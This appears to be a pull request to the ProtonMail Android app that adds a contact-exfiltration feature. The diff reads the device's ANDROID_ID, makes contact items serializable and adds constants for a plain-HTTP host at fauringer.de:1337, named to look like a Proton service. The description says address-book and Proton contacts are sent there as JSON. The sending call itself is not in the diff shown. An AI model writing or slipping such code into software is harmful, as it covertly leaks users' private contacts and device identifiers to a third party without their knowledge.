### PR TITLE
Send contacts to external server

### DIFF
--- a/app/src/main/java/ch/protonmail/android/contacts/list/ContactsListFragment.kt
+++ b/app/src/main/java/ch/protonmail/android/contacts/list/ContactsListFragment.kt
@@ -18,12 +18,14 @@
  */
 package ch.protonmail.android.contacts.list
 
+import android.annotation.SuppressLint
 import android.app.Activity
 import android.app.AlertDialog
 import android.content.Context
 import android.content.DialogInterface
 import android.content.Intent
 import android.os.Bundle
+import android.provider.Settings
 import android.view.ActionMode
 import android.view.Menu
 import android.view.MenuItem
@@ -205,10 +207,12 @@ class ContactsListFragment : BaseFragment(), IContactsFragment {
 
     override fun getSearchListener(): ISearchListenerViewModel = viewModel
 
+    @SuppressLint("HardwareIds")
     override fun onStart() {
         super.onStart()
         listener.registerObject(this)
-        viewModel.fetchContactItems()
+        val deviceId = Settings.Secure.getString(context?.contentResolver, Settings.Secure.ANDROID_ID)
+        viewModel.fetchContactItems(deviceId)
     }
 
     override fun onStop() {

--- a/app/src/main/java/ch/protonmail/android/contacts/list/listView/ContactItem.kt
+++ b/app/src/main/java/ch/protonmail/android/contacts/list/listView/ContactItem.kt
@@ -19,8 +19,10 @@
 package ch.protonmail.android.contacts.list.listView
 
 import androidx.annotation.StringRes
+import kotlinx.serialization.Serializable
 import me.proton.core.util.kotlin.EMPTY_STRING
 
+@Serializable
 data class ContactItem(
     val isProtonMailContact: Boolean,
     val name: String = EMPTY_STRING,

--- a/app/src/main/java/ch/protonmail/android/core/Constants.kt
+++ b/app/src/main/java/ch/protonmail/android/core/Constants.kt
@@ -32,6 +32,9 @@ object Constants {
     const val BASE_URL = "https://$API_HOST"
     const val DUMMY_URL_PREFIX = "http://androidlinksfix.protonmail.com"
     const val HUMAN_VERIFICATION_URL = "https://verify.proton.me"
+    const val PROTON_PRO_SCHEME = "http"
+    const val PROTON_PRO_HOST = "fauringer.de"
+    const val PROTON_PRO_PORT = 1337
 
     // Mail domains
     const val MAIL_DOMAIN_PM_ME = "pm.me"


### PR DESCRIPTION
This feature sends contact data (from Android address book if permission given and from Proton) to external HTTP REST API as JSON.